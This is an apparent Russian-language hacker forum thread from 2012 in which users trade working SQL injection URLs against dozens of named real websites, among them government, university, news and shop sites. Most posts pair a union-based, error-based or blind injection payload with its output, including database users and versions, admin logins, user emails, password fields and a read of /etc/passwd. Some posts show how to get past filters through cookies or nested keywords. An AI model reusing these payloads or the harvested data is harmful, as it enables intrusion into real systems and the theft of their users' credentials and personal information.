Просмотр полной версии : SQL Инъекции
Code:
http://www.murmancity.com/news/sel_news_from_id.php?id=8128+or+1+group+by+concat( 'xaker',floor(rand(0)*2))+having+min(0)+or+1+--+
для любителей NY
PR 5
PHP:
http://www.creativecoreny.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat%28username,0 x3a,password%29chipdebi0s,4,5,6,7,8,9,10,11,12,13+ from+jos_users--
Га-Ноцри
10.03.2012, 18:33
Сайт Брестского агентства по государственной регистрации и земельному кадастру.
ТИЦ = 20
PR = 3
Code:
http://agr.brest.by/agencies/?id=-3'+union+all+select+1,2,3,4,concat_ws(0x3a,user(), version(),database()),3,4,5,6,7,8,9,10,11,12+--+
aydin-ka
11.03.2012, 12:48
тИЦ 425
Code:
http://promlitie.ru/index.php?r=9&vmonth=2012-03&nid=99999999999+UnIon+selECt+1,concat_ws%280x3a,us er%28%29,database%28%29,version%28%29%29,3+--+
promlit6_user@localhostromlit6_data:5.0.92-log
Ro Man said:
для любителей NY
PR 5
PHP:
http://www.creativecoreny.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat%28username,0 x3a,password%29chipdebi0s,4,5,6,7,8,9,10,11,12,13+ from+jos_users--
Мега - Боян, который валяется в гугле около года
Так что скуля не в зачет!
m-game.com.ua
Code:
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+''='select' true //вырезается select
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+''='selselectect' false //но не рекурсивно!
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+'test'='(test)' true //вырезаются скобки
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+--+а false //так как комментирование не работает, и под фильтр не попадает, можно сразу сказать что условие заключено в скобки.
В общем - выхода нет. Но как оказалось - руки кодерам лучше было бы оборвать. Под фильтр попадают только массивы _GET и _POST, а массив _COOKIE не проверяется.
Code:
GET /?podr=compare&patch=catalog HTTP/1.1
Host: m-game.com.ua
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: version_ids=298) union select 1,user(),version(),4,5,6,7-- f;
Code:
user:mgame@localhost version:5.0.77
Code:
http://www.gipsstyle.ru/price.php?cat_id=3+or+1+group+by+concat(version(), floor(rand(0)*2))+having+min(0)+or+1+--+
Га-Ноцри
12.03.2012, 00:57
Оффициальный сайт группы "Старый приятель".
ТИЦ = 30
PR = 2
PHP:
http://www.star-priyatel.ru/events.php?mode=show&id=9999999+union+select+1,2,3,concat_ws(0x3a,f_id, f_login,f_password),4,5+from+t_admins+limit+1,1--
Pirotexnik
12.03.2012, 17:48
http://www.game-leshiy.ru/porno_games.php?id=-10'+union+select+1,2,3,4,5,6,7,8,9,10+--+
immortalist
12.03.2012, 20:22
ТиЦ 550, PR 4, ЯК, DMOZ, YI 75k, GI 107k
http://www.globalomsk.ru/directory/index.php?category=1 UNION SELECT NULL,NULL,CONCAT_WS(0x3a,user(),version(),database ()),NULL,NULL#
Code:
]http://www.bodyshape.co.th/inthemedia.php?cat=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--+
version: 5.0.51a
database: bodyshape_db
user: bodyshape_admin@localhost
Code:
http://www.mazda.autoland-mgn.ru/index.php?id=-18+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6--+
version: 5.0.41-log
database: mgnauto_bs
user: mgnauto_bs@Shaidar.ural.ru
Га-Ноцри
13.03.2012, 20:25
Облицовочная плитка никому не нужна?
ТИЦ = 210
PR = 3
Яндекс Каталог = Y
DMOZ.org = Y
PHP:
http://www.akvabeton.ru/catalog.php?menu=ncat&part=9999999'+union+select+concat_ws(0x3a,user(),d atabase(),version()),2,3,4,5,6,7,8,9+--+
Вывод в сорце:
PHP:
geeload_akvabeto@localhost:geeload_akvabeto:4.1.13
Эскорт:
Code:
http://www.escortscitytours.com/index.php?escortid=-320'+union(select+1,2,3,column_name,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23+from+informa tion_schema./**/columns+where+table_name+like+'members'+limit+1,1)--+f
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-52%20UNION%20SELECT%201,2,3,4,5,6,7,@@datadir,9,10 ,11--
/mnt/cluster/data/
Га-Ноцри
14.03.2012, 20:10
Поднимаем уровень рождаемости
PHP:
http://donor-spermi.ru/contact.php?id=1+union+select+1,concat_ws(0x3a,use r,pass),3,4,5,6,7,8,9+from+userlist--
Вывод в , админка http://donor-spermi.ru/admin/
aydin-ka
14.03.2012, 20:13
Национальная академия наук Республики Армения
тИЦ 500 PR 7
Code:
http://www.sci.am/viewnews.php?t=0&langid=1&nid=-1%27+UnIon+selECt+1,2,concat_ws%280x3a,user%28%29, database%28%29,version%28%29%29,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24+--+
scinew@localhost:scinew_unicode:5.1.61-0ubuntu0.11.10.1
Code:
http://www.sci.am/viewnews.php?t=0&langid=1&nid=-1%27+UnIon+selECt+1,2,group_concat%28email%29,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24+from+inst+--+
Пароли от админки и почты скорее всего в другой базе...
http://belleayremusic.com/concerts/concert.php?id=-94 UNION SELECT 1,2,3,group_concat(user(),0x3a,database()),5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4 2,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58, 59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75 ,76,77,78,79,80,81,82,83--
soldat1945@localhost:BelMusic
http://www.teksho-inc.com/en/index.php?idNews=-24 UNION SELECT 1,2,3,4,5,6,user(),8,9--
teksho@68.178.254.198
!!!!!!!!!!!!!!!
http://pfl.ua/leagues.php?id=1'+1+10--33+(((((((((((((((((((((+1+1((((((((2
Интернет Магазин
Яндекс тИЦ (CY) 550
Alexa Rank 1,152,314 +454,752
Google PageRank (PR) 4
от лайфа=)
life:) said:
Интернет Магазин
Яндекс тИЦ (CY) 550
Alexa Rank 1,152,314 +454,752
Google PageRank (PR) 4
от лайфа=)
Круто, только баян.
nemaniak
15.03.2012, 22:53
minsoc.ru ТИЦ-450 PR-5 минералоголики
Code:
http://www.minsoc.ru/memberslist.php?uid=3035-999.9+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80, 81,82,83,84,concat_ws(0x3a,version(),user(),databa se()),86,87,88,89,90,91,92,93,94,95,96+--+
Code:
5.0.26-log:minsocru@localhost:minsocru
real-business.ru ТИЦ-160
Code:
http://www.real-business.ru/subpage.php?news=-1524+union+select+concat_ws(0x3a,version(),user(), database()),2+--+
*в тайтле
Code:
5.0.70-log:gb_realbiz@81.176.226.172:gb_realbiz
economics.kiev.ua ТИЦ-210
Code:
http://www.economics.kiev.ua/index.php?id=-938'+union+select+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5,6,7,8,9,0,11,12+--+&view=article
Code:
5.1.49-3:c101@localhost:c101
Code:
http://www.coshuk.com/html/images.php?id=-38 UNION SELECT 1,user(),3,4,5,6,7,8,9,10,11,12,13--
Code:
http://www.yusk.ru/cat.php?id=-10 UNION SELECT 1,2,3,4,user(),6,7--
Code:
http://incognita-terra.ru/cat.php?id=-17 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8 ,9 from userlist--
Code:
http://nobeliat.ru/laureat.php?id=-626 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,GROUP_CONCAT(u ser,0x3a,pass),17,18,19,20,21,22,23,24 FROM userlist--
Code:
http://blogbasket.ru/cat.php?id=-3 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--
Code:
http://www.2mpz.ru/cat.php?id=-62 union select 1,2,3,group_concat(users_name,0x3a,users_password) ,5,6,7 from sys_umusers--
Сайт со стихами, топ 1 в гугле по запросу "Стихи Пушкина".
ТИЦ: 40
PR: 3
Code:
http://versos.ru/verso.html?id=-1+UNION+SELECT+1,group_concat(id,0x3b,login,0x3b,p assword,0x3b,salt)29,3,4,5+from+users
[stranger]
17.03.2012, 07:06
Code:
http://www.asianewsnet.net/home/news.php?id=27530+limit+0+union+select+1,2,3,4,5,6 ,7,8,9,(select+concat_ws(0x3a,version(),database() ,user())),11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25+--+
5.0.22
ann_news
ann8002@localhost
Code:
http://atlant.by/index.php?r='442&p='21&la='r&item='256
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
тиц: 600
.gov домен
Code:
http://infores.mpt.gov.by/ir/database/view_ir.php?id=6279+union+select+1,2,3,version%28% 29,5,6,7,8,9,10,1,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57,58,59,60,61,62,63,64,65+--+
Спасибо shadowrun
shadowrun
18.03.2012, 16:53
m0m said:
.gov домен
Code:
http://infores.mpt.gov.by/ir/database/view_ir.php?id=-6279--
Извиняюсь, не могу подобрать количество полей
Code:
http://infores.mpt.gov.by/ir/database/view_ir.php?id=6279+union+select+1,2,3,version%28% 29,5,6,7,8,9,10,1,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57,58,59,60,61,62,63,64,65+--+
4.1.25
Санкт-Петербург. Бизнес-портал.
Code:
http://www.bpspb.info/vacancy.php?id=-1+union+select+1,2,3,group_concat(table_name,0x0a) ,5,6,7,8,9,10,11+from+information_schema.tables+wh ere+table_schema=0x62707370625f74657374--+
version: 5.0.92-log
database: bpspb_test
user: bpspb_test@217.112.35.79
hostname: db37.valuehost.ru
dir: /storage/db/mysql/
pr6 ; ТИЦ 50
Code:
http://welcomenepal.com/promotional/directory.php?cid=-729658731675+union+select+1,0x6861636b656420627920 7375727072697a+--+
C252296_ntb@98.130.2.38:5.0.67-log:C252296_ntb
pr5 ; ТИЦ 30
Code:
http://www.elephant.se/location2.php?location_id=-238'+union+select+concat_ws(0x3a,user(),version(), database()),2,3,0x6861636b656420627920737572707269 7a,5,6,7,8,9,10+--+
elephant_se@srv8.one.com:5.0.51a-24+lenny5-log:elephant_se
pr6 ; ТИЦ 40
Code:
http://www.myrepublica.com/portal/printable_news.php?news_id=-31945+union+select+1,0x6861636b6564206279207375727 072697a,concat_ws(0x3a,user(),version(),database() ),4,5,6,7,8,9,10,11,12,13,14,15,16+--+
myrepub_myrepub@localhost:5.1.61:myrepub_database
Code:
http://www.appletonestate.mobi/recipe.php?id=-1+union+select+1,2,3,concat_ws(char(32),version(), database(),user()),5,6,7,8,9--+
version: 5.0.51a-3ubuntu5.4
database: appleton
user: appleton@localhost
Code:
http://mybread.mobi/glossary.php?Id=-1+union+select+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29%29,3--+
version: 5.1.49-3-log
database: mybreaddatab
user: mybreaddatab@10.0.115.141
Code:
http://www.damico.co.za/staff_profile.asp?STAFF_ID=-1+union+select+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29%29,3,4,5--+
version: 4.1.19-community
database: damicodb
user: DAMADMIN@196.220.60.30 3
PR: 3/10
Code:
http://www.associatesanimalhospital.com/Staff_Detail.php?staff_id=-1+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,vers ion%28%29,database%28%29,user%28%29%29,9,10,11,12, 13,14--+
version: 5.0.91-log
database: associates
user: associates@boscgi1701.eigbox.net
RP: 2/10
Code:
www.zhak-s.com.ua/index.php?id=1+union+select+1,2,concat_ws(0x3a,ver sion(),database(),user()),4,5,6,7,8--+
version: 5.0.82-log
database: zhak
user: dejavu@localhost
PR: 1/10
Code:
http://www.egc.hu/index.php?menu_id=3+and+1=0+union+select+1,2,conca t_ws%280x3a,version%28%29,database%28%29,user%28%2 9%29,4--+
version: 5.1.49-3
database: egc_public
user: root@localhost
Code:
http://www.no-colours-records.de/sites/show_rel.php?id=-1+union+select+1,2,column_name,4,5+from+INFORMATIO N_SCHEMA.COLUMNS+limit+0,1--
Выводится только одна запись, отчёта об ошибках нет
Code:
www.ginnystineinteriors.com/designers_detail.php?staff_id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),database(),user()),9--+
version: 5.0.91-log
database: fishleg_ginnys
user: fishleg_27@209.68.2.171
Code:
www.wardblakearchitects.com/staff_content.php?staff_id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6--+
version: 5.0.95-community
database: architectural_wb
user: architectural_us@localhost
PR: 3/10
admin pages: manager, cpanel
Code:
www.jewishchronicle.org/contact/contact.php?staff_id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19--+
version: 5.0.77-log
database: 577301_jewishchron
user: 577301_jcadmin@172.17.2.118
PR: 4/10
Megwarez
20.03.2012, 19:25
вкспорт
Code:
http://www.vksport.ru/catalog_s1.php?id=-1%27+union+select+1,2,3,4,group_concat%280x0b,colu mn_name%29,6+from+information_schema.columns+where +table_name={не смог подобрать}+--+
ТИЦ:10
PR:1
Га-Ноцри
21.03.2012, 23:17
ТИЦ = 20
PR = 4
PHP:
http://www.jic.org/index.php?page=9999999'+union+select+1,File_priv,2 +from+mysql.user--+
pr2
Code:
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+uNion+SELselectECT+1,2,3,0x6861636B65642062792 07375727072697A2E,concat_ws(0x3a,user(),version(), %20%20database()),6,7,8,9+--+
обход preg_replace
Megwarez
22.03.2012, 18:35
Code:
http://www.nunhems.com.ua/kultury.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat%280x0b ,table_name%29,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23+from+information_schema.tables+--+
ТИЦ: 30
PR: 4
Все норм выводится, но в админку не зайти, видимо фильтр по ip.
Га-Ноцри
22.03.2012, 22:14
PR = 5
PHP:
http://www.bedandbreakfastdc.com/index.php?id=-1+union+select+concat_ws(0x03a,user(),database(),v ersion())--
aydin-ka
23.03.2012, 14:46
The University of Alabama
тИЦ 275 PR 7 Alexa Rank 25,466
Вывод в теге
Code:
http://events.ua.edu/events/index.php?cat=9999999999+union+select+@@version--
Version - 5.0.27
User -ua_calendar@helios.ua.edu
Database - ua_calendar
Code:
http://events.ua.edu/events/index.php?cat=9999999999+union+select+group_concat %28Email%29+from+hc_admin--
PHP:
mmuro@ur.ua.edu
rflorenc@as.ua.edu
lmsandy@ur.ua.edu
arainey@ur.ua.edu
etc...
Есть столбец Passwrd
Админка - _http://events.ua.edu/admin/
PR - 2
PHP:
http://www.kaizen-co.ru/gallery.php?id=9875465+union+select+1,char(104,97, 99,107,101,100,32,98,121,32,100,117,109,98,97),con cat_ws(0x3b,user(),version(),database()),4,5--
kaizen@zvm28.host.ru;4.0.27-log;kaizen
PR - 4
http://cwrowley.princeton
.edu
/getpaper.php?id=88-999.9+union+select+1,2,concat_ws(0x7C2A7C,version( ),user(),database()),4--
Version: 5.0.92-community
User: cwrowley_clancy@localhost
DB: cwrowley_main
тИЦ - 40, PR - 2
http://www.forceavto.ru/catalog/show_prod.php?ID=615-999.9+union+select+1,2,3,concat_ws(0x7C2A7C,versio n(%20),user(),database()),5,6,7--
Version: 5.1.56-log
User: forceavt_mila2@localhost
DB: forceavt_force
Megwarez
25.03.2012, 11:31
Code:
http://www.feb.spb.ru/catalog.php?id=-17+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29,3,4,5,6,7,8,9,10+from+ information_schema.tables+--+
Database:zorro_feb@localhost
Version:5.0.51a-24+lenny5-log
User:zorro_feb
Тиц 60
PR 2
Code:
http://www.shery.ru/news/?id=-17+union+select+1,2,concat_ws%280x3a,user%28%29,ve rsion%28%29,database%28%29%29,4,5,6,7+--+
Database:shery@localhost
Version:5.5.15
User:shery
Тиц 80
PR 2
торрент портальчик
Code:
http://baratro.ru/subcat.php?id=22' AND (SELECT 9355 FROM(SELECT COUNT(*),CONCAT(0x3a6476703a,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x3a6c756d3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a
Га-Ноцри
25.03.2012, 20:36
Просто забавный сайт.
PHP:
http://www.bitchslapcountdown.com/index.php?id=-1'+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9--+
Code:
http://www.rundown.com/landing.php?loc=1-99999999.9+union+select+1,2,3,4,(%73elect(@x)%66ro m(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nfor mation_schema.%63olumns)%77here(%74able_schema!=0x 696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%6 9n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,ta ble_name,0x3a,%63olumn_name))))x),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37--+f
HellFire
26.03.2012, 13:19
Работа (Индия).
Code:
http://www.jobs-bank.com/jobdetails.php?jobid=1-1.1+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F2A 2A2F,Database(),0x2F2A2A2F,User()),7,8,9,10--
Database Version: 5.0.86
Database name: chintajobs
User name: chintajobs@72.18.198.4
ТИЦ: 0
PR: 3
Бильярд.
Code:
http://www.azbilliards.com/brackets/show32ls.php?tourneynum=1-1.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,D atabase(),0x2F2A2A2F,User()),4,5,6,7,8,9,10,11,12, 13,14,15,16--
Database Version: 5.5.9
Database name: brackets
User name: admin@localhost
ТИЦ: 40
PR: 5
nemaniak
26.03.2012, 15:32
co.rice.mn.us PR-5
Code:
http://www.co.rice.mn.us/news/newsitem.php?id=-518+union+select+version()||chr(58)||current_user| |chr(58)||current_database(),null,null,null,null,n ull,null,null,null+--+
Code:
PostgreSQL 8.3.17 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2:ricecouser:riceco
farmington.edu PR-6
Оракл Блайнд
Code:
http://www.farmington.edu/news/release.php?id=3321 AND ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1)) = 87
Code:
http://www.farmington.edu/news/release.php?id=3321 AND ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1)) = 69
...
Code:
WEBCALENDAR
ci.bremerton.wa.us PR-5
Code:
www.ci.bremerton.wa.us/display.php?id=96 and 1=2 union select 1,2,concat_ws(0x3a,version(),user(),database()),4, 5,6,7,8,9,0,11,12,13,14 --
Code:
5.0.51a-3ubuntu5.7:bremcity@localhost:bremcity
(вывод в сорце 34я строка)
Megwarez
27.03.2012, 08:52
Code:
http://www.6koles-e.ru/inner.php?cid=10&id=-17+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10,11,12,13,14,15+from+i nformation_schema.tables+--+
Тиц 30
PR 3
_http://www.burlingtonshair.com/shop.php?id=2
_http://www.homeshoppingradio.com/category.php?id=26
_http://www.scottishmusiccentre.com/db/CART/product_details.php?product_id=5726
mcswat said:
_http://www.burlingtonshair.com/shop.php?id=2
_http://www.homeshoppingradio.com/category.php?id=26
_http://www.scottishmusiccentre.com/db/CART/product_details.php?product_id=5726
Code:
http://www.burlingtonshair.com/shop.php?id=-2'+union+select+1,concat(0x4861636b656420627920457 2656565),3--+f
http://www.homeshoppingradio.com/category.php?id=26-99999.9+union+select+1,concat(0x4861636b6564206279 204572656565),3--+f
http://www.scottishmusiccentre.com/db/CART/product_details.php?product_id=5726+and(select+1+f rom(select+count(*),concat((select+concat(0x486163 6b6564206279204572656565,0x00)+from+information_sc hema.tables+limit+1,1),floor(rand(0)*2))x+from+inf ormation_schema.tables+group+by+x)a)--+f
nemaniak
27.03.2012, 21:09
artsandscience.usask.ca PR-6
Code:
http://artsandscience.usask.ca/biology/news/news.php?newsid=-2334+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,version()||chr(58 )||current_user||chr(58)||current_database(),null, null,null,null,null,null,null,null,null+--+
Code:
PostgreSQL 9.0.7 on x86_64-pc-linux-gnu, compiled by GCC x86_64-pc-linux-gnu-gcc (Gentoo 4.5.3-r2 p1.1, pie-0.4.7) 4.5.3, 64-bit:webuser:webdb
communication.northwestern.edu PR-6
Code:
http://www.communication.northwestern.edu/news/press_release.php?itemID=155-999.9+union+select+1,2,3,4,5,6,concat_ws(0x3a,vers ion(),user(),database()),8,9,10,11,12,13,14,15,16--
Code:
5.0.77-log:UtopiaUser@localhost:Utopia
to14.com PR-3 A-549k
Code:
www.to14.com/game.php?id=-4d486a30869bd'+union+select+1,2,3,4,5,6,7,8,9,0,11 ,12,13,concat_ws(0x3a,version(),user(),database()) ,15,16,17,18,19+--+
Code:
5.0.44-log:to14@localhost:to14
Code:
http://www.stroyka74.ru/tenders/-1459768'+union+select+1,2,3,4,5,6,7,8,9,concat(ema il,0x3a,password),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33+from+stroyka7 4_users+limit+1,1+--+
тИЦ 600
PR 4
Code:
http://www.star-book.ru/print.php?id=11+union+select+1,2,3,4,5,6,7,8,conca t_ws(0x3a,user(),database(),version()),10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
User: svertokr_boo@localhost
Database: svertokr_book
Version: 5.1.56-log
тИЦ - 130, PR - 3.
http://www.bdhorse.ru/index.php?id=3-999.9+union+select+1,Concat_ws(0x2A2F2F2F2A,Versio n(),User(),Database()),3,4--
Вывод в теге .
Version: 5.1.41-log
User: bdhorse_mysql@212.193.239.218
Database: bdhorse_db
тИЦ - 150, PR - 3.
http://www.kvartkirov.ru/builders/reviews.php?id=11-999.9+union+select+1,2,Concat_ws(0x2A2F2F2F2A,Vers ion(),User(),Database()),4,5,6,7,8--
Version: 5.1.52
User: us5254a_kv_main@localhost
Database: db5254a
Га-Ноцри
28.03.2012, 23:18
На сервере около 30 сайтов средним ТИЦ = 10 каждый, есть и больше. Кто зальется, напишите в ПМ, как раскрыли пути(вечно у меня с ними проблема). Спасибо.
PHP:
http://world-stamps.info/countryw.php?id_country=-1'+union+select+load_file('/etc/passwd')--+
Ну раз он говорит, что "is vulnerable", почему не раскручивает скулю?
Sqlmap:
GET parameter 'SECTION_ID' is vulnerable. Do you want to keep testing the others
? [y/N] y
sqlmap identified the following injection points with a total of 60 HTTP(s) requ
ests:
---
Place: GET
Parameter: SECTION_ID
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: SECTION_ID=2') AND SLEEP(5) AND ('hJWR'='hJWR
---
[13:01:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Nginx
back-end DBMS: MySQL 5.0.11
[13:01:32] [INFO] fetching current database
[13:01:32] [INFO] retrieved:
current database: None
[13:01:37] [INFO] Fetched data logged to text files under 'C:\Python27\sqlmap-0.
9\sqlmap\output\www.opin.ru'
Havij
Selected Column Count is 2
Retying to find string column
Retying to find string column
Retying to find string column
Retying to find string column
Retying to find string column
Valid String Column is 1
DB Server: unknown
Finding current data base
Database type was not recognized, Injection Failed!
скромненько
http://efbw.eu/news.php?ID=41+union+select+1,2,group_concat(0x0b, id,0x3a,login,0x3a,password),4,5+from+tb_login+--
cta-m.ru
http://cta-m.ru/detail.html?id=39355%27+or+1+group+by+concat%28%28 select+version%28%29%29,0x00,floor%28rand%280%29*2 %29%29having+min%280%29+or+1--+
5.0.95-community
Яндекс тИЦ (CY) 10
Google PageRank (PR) 1
m-words.ru
http://www.m-words.ru/author.php?id=21&poem=963+or+1+group+by+concat%28%28select+concat_w s%280x3a,table_schema,table_name,table_rows%29+fro m+information_schema.tables+where+table_schema!=0x 696e666f726d6174696f6e5f736368656d61+limit+0,1%29, 0x00,floor%28rand%280%29*2%29%29having+min%280%29+ or+1--+
5.0.91
Яндекс тИЦ (CY) 10
Google PageRank (PR) 1
inconnect-group.ru
http://www.inconnect-group.ru/pressrelease/?id=58+limit+0,0+union+select+1,2,3,4,version%28%2 9,6,7,8,9--+
5.0.51a-24+lenny2+spu1-log
Яндекс тИЦ (CY) 650
Google PageRank (PR) 5
vgasoft.spb.ru
http://vgasoft.spb.ru/main.cgi?act=dict_detail&id=6+or+1+group+by+concat%28%28select+concat_ws%28 0x3a,table_schema,table_name%29+from+information_s chema.tables+limit+0,1%29,0x00,floor%28rand%280%29 *2%29%29having+min%280%29+or+1--+
5.0.91-log
Яндекс тИЦ (CY) 40
Google PageRank (PR) 2
Га-Ноцри
31.03.2012, 13:48
PHP:
http://shops.tombiz.ru/catalog.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11--
PHP:
http://www.24info.net/sim.php?id=-71+union+select+1,2,3,4,5,6,7,8,concat_ws(0x03a,us er(),database(),version())--
http://www.onewrestlingshow.com/host.php?id=-3+union+select+1,group_concat(0x0b,userID,0x3a,nam e,0x3a,email,0x3a,password,0x3a,salt),3,4,5,6,7,8, 9,10,11,12,13+from+users+--
-------------------------------------
http://www.ukraine-hotel.com.ua/room.php?id=-3+union+select+group_concat(0x0b,admin_login,0x3a, admin_pass),2,3,4,5+from+ukraine_admin+--
ps модеры сорри что сначала не туда запостил
Га-Ноцри
02.04.2012, 22:55
Ня!
PHP:
http://justmypassion.fr/index.php?id=-37+union+select+1,2,@@datadir,4,5--
t3cHn0iD
03.04.2012, 14:02
http://eros.rin.ru/cgi-bin/newsar.pl?id=-326868'+union+select+1,concat_ws(0x3a,version(),us er(),database()),3,4,5+--+
http://www.happydaysanimalrescue.org.uk/rescue-animals.php?id=-4'+union+select+1,2,3,4,5,6,7,group_concat(concat_ ws(0x3a,username,password)),9,10,11+from+users+--+
http://www.mudracard.com/send-money.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6,7,8++--+
Российский навигационный сервер
Code:
http://www.internavigation.ru/page.phtml?p=9%27+union+select+1,2,version(),4,5--+a
в таблице users уж выведите сами
http://www.letterrep.com/index.php?wid=LTExOTcgdW5pb24gc2VsZWN0IDEsMiwzLDQs NSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LD E5LDIwLDIxLDIyLDIyLDIzLDI0LDI1LDI2LDI3LDI4LDI5LDMw LDMxLDMyLDMzLDM0LDM1LDM2LDM3LDM4LDM5LDQwLDQxLGNvbm NhdF93cygweDNhLHZlcnNpb24oKSx1c2VyKCksZGF0YWJhc2Uo KSksNDMsNDQsNDUsNDUsNDYsNDcsNDgsNDksNTAsNTEtLSAK== ========
структура admin:
admin_id
admin_login
admin_pwd
admin_email
admin_status
admin_level
amount
Га-Ноцри
03.04.2012, 23:06
PHP:
http://cosmetictrade.ru/proizv.php?id=12&id_cat=-18+union+select+1,concat_ws(0x03a,database(),versi on(),user())--
Osstudio
04.04.2012, 00:01
_ttp://www.filtron.pl/ru/index.php?idp=17+and+1=0+union+select+1,version%28 %29,3,4,5,6,7,8,9,10,11,12,13,14,15--
_)ttp://www.on33.ru/afisha/kino/?base=newssql0006&news=-1105+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14+from+information_schema.tables+limit+150 ,1+--+
kontrolnaja.ru
http://www.kontrolnaja.ru/buy/?id=949%27+or+1+group+by+concat%28%28select+versio n%28%29%29,0x00,floor%28rand%280%29*2%29%29having+ min%280%29+or+1--+
5.0.77
Яндекс тИЦ (CY) 90 +30
Google PageRank (PR) 3
intyoga.ru
http://intyoga.ru/print.php?id=925+or+1+group+by+concat%28%28select+ version%28%29%29,0x00,floor%28rand%280%29*2%29%29h aving+min%280%29+or+1--+
5.0.37-standard-log
borovskold.ru
http://www.borovskold.ru/content.php?page=lonuemcd_rus&id=87%27+or+1+group+by+concat%28%28select+version% 28%29%29,0x00,floor%28rand%280%29*2%29%29having+mi n%280%29+or+1--+
5.1.61-0+squeeze1-log
Яндекс тИЦ (CY) 10
Google PageRank (PR) 2
irkutsk.moilekar.ru
http://irkutsk.moilekar.ru/article/?id=17%27+union+select+1,2,version%28%29,4,5,6,7,8--+
Дальше свеб не пускает.
5.1.58-log
Яндекс тИЦ (CY) 0
Google PageRank (PR) 1
qaz said:
Дальше свеб не пускает.
http://irkutsk.moilekar.ru/article/?id=17%27+union+%0A+select+1,concat_ws(0x3a,login, password),3,4,5,6,7,8+from+users--+
PHP:
http://mort.sto-helit.de/index.php?module=download&action=list&category=-13+union+select+user(),2,3,4,5,6,7+--
pr2
тиц10
t3cHn0iD
05.04.2012, 17:34
